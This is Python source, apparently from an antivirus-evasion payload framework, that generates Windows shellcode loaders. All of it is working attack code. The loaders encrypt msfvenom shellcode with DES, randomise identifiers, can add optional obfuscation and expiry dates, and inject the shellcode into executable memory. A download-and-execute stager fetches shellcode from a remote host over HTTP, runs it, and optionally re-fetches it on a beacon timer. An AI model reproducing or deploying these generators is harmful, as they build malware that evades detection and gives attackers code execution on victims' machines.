                PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
                PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n'
                PayloadCode += '\t' + RandDESKey + ' = \'' + DESKey + '\'\n'
                PayloadCode += '\t' + RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
                PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
                PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
                PayloadCode += '\t' + RandPtr + ' = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len('+ ShellcodeVariableName +')),avlol.c_int(0x3000),avlol.c_int(0x40))\n'
                PayloadCode += '\t' + RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
                PayloadCode += '\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
                PayloadCode += '\t' + RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                PayloadCode += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

        if self.required_options["INJECT_METHOD"][0].lower() == "heap":
            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Generate Random Variable Names
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                ShellcodeVariableName = helpers.randomString()
                RandIV = helpers.randomString()
                RandDESKey = helpers.randomString()
                RandDESPayload = helpers.randomString()
                RandEncShellCodePayload = helpers.randomString()
                HeapVar = helpers.randomString()

                # encrypt the shellcode and get our randomized key/iv
                (EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)

                # Create Payload File
                PayloadCode = 'from Crypto.Cipher import DES\n'
                PayloadCode += 'import ctypes as avlol\n'
                PayloadCode += RandIV + ' = \'' + iv + '\'\n'
                PayloadCode += RandDESKey + ' = \'' + DESKey + '\'\n'
                PayloadCode += RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
                PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
                PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
                PayloadCode += HeapVar + ' = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(' + ShellcodeVariableName + ') * 2),avlol.c_int(0))\n'
                PayloadCode += RandPtr + ' = avlol.windll.kernel32.HeapAlloc(avlol.c_int(' + HeapVar + '),avlol.c_int(0x00000008),avlol.c_int(len( ' + ShellcodeVariableName + ')))\n'
                PayloadCode += RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
                PayloadCode += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
                PayloadCode += RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                PayloadCode += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

            else:

                # Get our current date and add number of days to the date
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Generate Random Variable Names
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                ShellcodeVariableName = helpers.randomString()
                RandIV = helpers.randomString()
                RandDESKey = helpers.randomString()
                RandDESPayload = helpers.randomString()
                RandEncShellCodePayload = helpers.randomString()
                HeapVar = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()

                # encrypt the shellcode and get our randomized key/iv
                (EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)

                # Create Payload File
                PayloadCode = 'from Crypto.Cipher import DES\n'
                PayloadCode += 'import ctypes as avlol\n'
                PayloadCode += 'from datetime import datetime\n'
                PayloadCode += 'from datetime import date\n\n'
                PayloadCode += RandToday + ' = datetime.now()\n'
                PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
                PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n'
                PayloadCode += '\t' + RandDESKey + ' = \'' + DESKey + '\'\n'
                PayloadCode += '\t' + RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
                PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
                PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
                PayloadCode += '\t' + HeapVar + ' = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(' + ShellcodeVariableName + ') * 2),avlol.c_int(0))\n'
                PayloadCode += '\t' + RandPtr + ' = avlol.windll.kernel32.HeapAlloc(avlol.c_int(' + HeapVar + '),avlol.c_int(0x00000008),avlol.c_int(len( ' + ShellcodeVariableName + ')))\n'
                PayloadCode += '\t' + RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
                PayloadCode += '\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
                PayloadCode += '\t' + RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                PayloadCode += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

        else:
            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Generate Random Variable Names
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                ShellcodeVariableName = helpers.randomString()
                RandIV = helpers.randomString()
                RandDESKey = helpers.randomString()
                RandDESPayload = helpers.randomString()
                RandEncShellCodePayload = helpers.randomString()
                RandShellcode = helpers.randomString()
                RandReverseShell = helpers.randomString()
                RandMemoryShell = helpers.randomString()

                # encrypt the shellcode and get our randomized key/iv
                (EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)

                # Create Payload File
                PayloadCode = 'from Crypto.Cipher import DES\n'
                PayloadCode += 'from ctypes import *\n'
                PayloadCode += RandIV + ' = \'' + iv + '\'\n'
                PayloadCode += RandDESKey + ' = \'' + DESKey + '\'\n'
                PayloadCode += RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
                PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
                PayloadCode += ShellcodeVariableName + ' = ' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n'
                PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
                PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
                PayloadCode += RandShellcode + '()'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

            else:

                # Get our current date and add number of days to the date
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Generate Random Variable Names
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                ShellcodeVariableName = helpers.randomString()
                RandIV = helpers.randomString()
                RandDESKey = helpers.randomString()
                RandDESPayload = helpers.randomString()
                RandEncShellCodePayload = helpers.randomString()
                RandShellcode = helpers.randomString()
                RandReverseShell = helpers.randomString()
                RandMemoryShell = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()

                # encrypt the shellcode and get our randomized key/iv
                (EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)

                # Create Payload File
                PayloadCode = 'from Crypto.Cipher import DES\n'
                PayloadCode += 'from ctypes import *\n'
                PayloadCode += 'from datetime import datetime\n'
                PayloadCode += 'from datetime import date\n\n'
                PayloadCode += RandToday + ' = datetime.now()\n'
                PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
                PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n'
                PayloadCode += '\t' + RandDESKey + ' = \'' + DESKey + '\'\n'
                PayloadCode += '\t' + RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
                PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
                PayloadCode += '\t' + ShellcodeVariableName + ' = ' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n'
                PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
                PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
                PayloadCode += '\t' + RandShellcode + '()'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode
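    def generate(self):
        """Build the Python source of a download-and-execute stager.

        The emitted script (Python 2 / Windows ctypes) fetches raw shellcode
        from ``http://DOWNLOAD_HOST:DOWNLOAD_PORT/DOWNLOAD_NAME`` with urllib2,
        copies it into an RWX allocation and runs it on a new thread.  When
        BEACON == 'y' a daemon thread re-fetches and re-runs the blob every
        BEACON_SECONDS.  Every identifier in the emitted script is randomized
        with helpers.randomString().

        Reads self.required_options: BEACON, BEACON_SECONDS, DOWNLOAD_HOST,
        DOWNLOAD_PORT, DOWNLOAD_NAME, USE_PYHERION.

        Returns:
            str: the stager source, passed through encryption.pyherion() when
            USE_PYHERION == 'y'.

        Security notes (operator caveats, not changed here):
          * The shellcode travels over plain HTTP and is executed as received;
            nothing authenticates the server or the blob, so anyone able to
            redirect or tamper with that connection controls what executes.
          * The emitted ctypes calls wrap the VirtualAlloc return value in
            ctypes.c_int, which truncates a 64-bit pointer; the stager should
            only be expected to work under a 32-bit Python interpreter.
        """
        imports = "import sys; import urllib2; import ctypes; import time; import signal; import threading\n"

        inject_func = helpers.randomString()
        getexec_func = helpers.randomString()
        main_func = helpers.randomString()
        beaconthr_func = helpers.randomString()

        # Decide once whether we beacon.  Previously the retry flag was only
        # assigned for 'y'/'n', so any other BEACON value raised
        # UnboundLocalError below; treat "not 'y'" as no beacon, which is the
        # test the main-loop emission already uses.
        beacon = self.required_options["BEACON"][0].lower() == 'y'

        retry_var = helpers.randomString()
        interval_var = helpers.randomString()
        opener_var = helpers.randomString()

        global_vars = "%s = %s" % (retry_var, "True" if beacon else "False")
        global_vars += "\n%s = %s" % (
            interval_var, self.required_options["BEACON_SECONDS"][0])
        global_vars += "\n%s = urllib2.build_opener()\n" % (opener_var)

        shellcode_var = helpers.randomString()
        ptr_var = helpers.randomString()
        ht_var = helpers.randomString()
        buff_var = helpers.randomString()

        # Injection routine: VirtualAlloc(0x3000 = MEM_COMMIT|MEM_RESERVE,
        # 0x40 = PAGE_EXECUTE_READWRITE), lock, copy, CreateThread, wait.
        # The pointer is squeezed through ctypes.c_int -- 32-bit only.
        inject = "def %s(%s):" % (inject_func, shellcode_var)
        inject += "\n\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))" % (
            ptr_var, shellcode_var)
        inject += "\n\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))" % (
            ptr_var, shellcode_var)
        inject += "\n\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)" % (
            buff_var, shellcode_var, shellcode_var)
        inject += "\n\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))" % (
            ptr_var, buff_var, shellcode_var)
        inject += "\n\t%s = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))" % (
            ht_var, ptr_var)
        inject += "\n\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(%s),ctypes.c_int(-1))\n" % ht_var

        # Fetch-and-run routine.  Its own parameter/local names are distinct
        # from the injection routine's so the two emitted functions do not
        # share identifiers.
        dl_url_var = helpers.randomString()
        dl_shellcode_var = helpers.randomString()
        info_var = helpers.randomString()
        thread_var = helpers.randomString()
        thread_name = helpers.randomString()

        # Any network/inject failure is swallowed on purpose: a beaconing
        # stager must survive a missing or unreachable download host.
        # Note there is no integrity check on the downloaded bytes.
        getexec = "def %s(%s):" % (getexec_func, dl_url_var)
        getexec += "\n\ttry:"
        getexec += "\n\t\t%s = %s.open(%s)" % (info_var, opener_var, dl_url_var)
        getexec += "\n\t\t%s = %s.read()" % (dl_shellcode_var, info_var)
        getexec += "\n\t\t%s = bytearray(%s)" % (dl_shellcode_var, dl_shellcode_var)
        getexec += "\n\t\t%s(%s)" % (inject_func, dl_shellcode_var)
        getexec += "\n\texcept Exception:"
        getexec += "\n\t\tpass\n"

        # Beacon loop: sleep, then re-fetch/re-run on a fresh daemon thread.
        beacon_url_var = helpers.randomString()

        beaconthr = "def %s(%s):" % (beaconthr_func, beacon_url_var)
        beaconthr += "\n\twhile True:"
        beaconthr += "\n\t\ttime.sleep(%s)" % interval_var
        beaconthr += "\n\t\t%s = threading.Thread(name='%s', target=%s, args=(%s,))" % (
            thread_var, thread_name, getexec_func, beacon_url_var)
        beaconthr += "\n\t\t%s.setDaemon(True)" % thread_var
        beaconthr += "\n\t\t%s.start()\n" % thread_var

        # Entry point: build the plain-HTTP URL, optionally start the beacon
        # thread, run once, and (when beaconing) keep the main thread alive
        # so the daemon thread is not killed at interpreter exit.
        main = "def %s():" % main_func
        main += "\n\t%s = 'http://%s:%s/%s'" % (
            beacon_url_var, self.required_options['DOWNLOAD_HOST'][0],
            self.required_options['DOWNLOAD_PORT'][0],
            self.required_options['DOWNLOAD_NAME'][0])
        main += "\n\tif %s is True:" % retry_var
        main += "\n\t\t%s = threading.Thread(name='%s', target=%s, args=(%s,))" % (
            thread_var, thread_name, beaconthr_func, beacon_url_var)
        main += "\n\t\t%s.setDaemon(True)" % thread_var
        main += "\n\t\t%s.start()" % thread_var
        main += "\n\t%s(%s)" % (getexec_func, beacon_url_var)
        if beacon:
            main += "\n\twhile True:"
            main += "\n\t\ttime.sleep(0.1)"
        main += "\nif __name__ == '__main__':"
        main += "\n\t%s()" % main_func

        PayloadCode = imports + global_vars + inject + getexec + beaconthr + main

        if self.required_options["USE_PYHERION"][0].lower() == "y":
            PayloadCode = encryption.pyherion(PayloadCode)

        return PayloadCode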